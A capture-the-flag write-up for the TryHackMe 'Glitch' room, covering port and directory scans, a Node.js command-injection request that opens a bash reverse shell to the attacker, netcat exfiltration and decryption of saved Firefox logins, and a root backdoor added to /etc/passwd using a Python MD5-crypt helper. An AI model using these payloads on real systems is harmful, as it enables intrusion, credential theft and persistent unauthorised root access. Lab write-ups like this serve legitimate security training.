Room Link: https://tryhackme.com/room/glitch
Initial Scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
Scan all ports: only TCP/80 is open, no other ports found
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/80 - HTTP
Looking into the api directory, gobuster finds an items page
Kali
gobuster dir -u http://$VICTIM/api -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Changing the request method from GET to POST returns an interesting error message about the request
Sending the request below shows the cmd query parameter is evaluated as server-side JavaScript (Node.js), so it is vulnerable to remote code execution. Replace $KALI with the attacking machine's IP and have a listener on TCP/1337 ready before sending; the & characters in the reverse shell are URL-encoded as %26 so they are not parsed as query-string separators
Initial Shell
Kali
Burp
POST /api/items?cmd=require("child_process").exec('bash+-c+"bash+-i+>%26+/dev/tcp/$KALI/1337+0>%261"') HTTP/1.1
Host: 10.10.22.153
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: token=value
Upgrade-Insecure-Requests: 1
Upgrade to a fully interactive TTY (tab completion, job control)
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Lateral Movement
Victim
tar -cvf backup.tar.gz .firefox/
(no -z, so despite the .gz name this is a plain uncompressed tar; tar xvf below still extracts it)
Netcat
Kali(receiving)
nc -l -p 1234 > backup.tar.gz
Victim(sending)
nc -w 3 $KALI 1234 < backup.tar.gz
Kali
tar xvf backup.tar.gz
git clone https://github.com/unode/firefox_decrypt.git
python3.9 firefox_decrypt/firefox_decrypt.py .firefox/
firefox_decrypt prints the saved Firefox logins, which give v0id's password; switch user on the victim
Victim
su v0id
Password: love_the_void
Victim
find / -perm -u=s -type f 2> /dev/null
Among the SUID binaries is /usr/local/bin/doas, and v0id is permitted to run commands as root through it
Victim
/usr/local/bin/doas -u root cat /root/root.txt
Privilege Escalation
I used doas to read /etc/passwd, saved a copy as passwd.old as a backup in case anything broke, then created passwd.new with an extra line for a new user with UID 0 (root) and an MD5-crypt hash of the password 123 (salt new) in the password field, and copied it over /etc/passwd
Victim
/usr/local/bin/doas -u root cat /etc/passwd
vi /tmp/passwd.new
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
/usr/local/bin/doas -u root cp /tmp/passwd.new /etc/passwd
su new
Password: 123
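Added example, not from the original writeup: a pure-Python MD5-crypt ($1$) implementation that reproduces the hash above from the password 123 and salt new, which is what openssl passwd -1 -salt new 123 produces, and builds the UID 0 passwd line. It is a check worth doing before overwriting /etc/passwd: confirm the hash you paste really is the password you intend, and that the line has seven fields with 0 in the UID field.

```python
"""Added example: reproduce the /etc/passwd backdoor line from the step above.

Not from the original writeup.  MD5-crypt is ported from the FreeBSD
reference algorithm so the hash can be checked without the deprecated
crypt module.
"""
import hashlib

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> bytes:
    """crypt(3)'s 6-bit little-endian encoding used by MD5-crypt."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password: str, salt: str) -> str:
    """MD5-crypt ($1$) as produced by openssl passwd -1 and glibc crypt(3)."""
    pw = password.encode()
    sl = salt.encode()[:8]          # the salt is capped at 8 bytes
    magic = b"$1$"

    ctx = hashlib.md5(pw + magic + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    # Mix in as many bytes of the alternate sum as the password is long
    pl = len(pw)
    while pl > 0:
        ctx.update(alt[: min(16, pl)])
        pl -= 16
    # Bit-by-bit mixing of a NUL byte or the first password byte
    i = len(pw)
    while i:
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    # 1000 rounds of stretching, alternating what gets hashed
    for rnd in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(pw if rnd & 1 else final)
        if rnd % 3:
            ctx1.update(sl)
        if rnd % 7:
            ctx1.update(pw)
        ctx1.update(final if rnd & 1 else pw)
        final = ctx1.digest()

    # Permuted 6-bit encoding of the 16 digest bytes (22 characters)
    out = b""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    out += _to64(final[11], 2)
    return (magic + sl + b"$" + out).decode()


def passwd_line(user: str, password: str, salt: str) -> str:
    """Build a UID 0 /etc/passwd entry with the hash in the password field.

    A hash placed directly in field 2 is used instead of /etc/shadow, which
    is why appending this line yields a root login with a known password.
    """
    return f"{user}:{md5crypt(password, salt)}:0:0:root:/root:/bin/bash"


def is_uid0_entry(line: str) -> bool:
    """Sanity check on a passwd line: seven fields and UID field equal to 0."""
    fields = line.split(":")
    return len(fields) == 7 and fields[2] == "0"


if __name__ == "__main__":
    line = passwd_line("new", "123", "new")
    print(line)
    print("uid0 entry:", is_uid0_entry(line))
```

Keep the passwd.old copy until the new line has been tested with su, since a malformed /etc/passwd can lock everyone out.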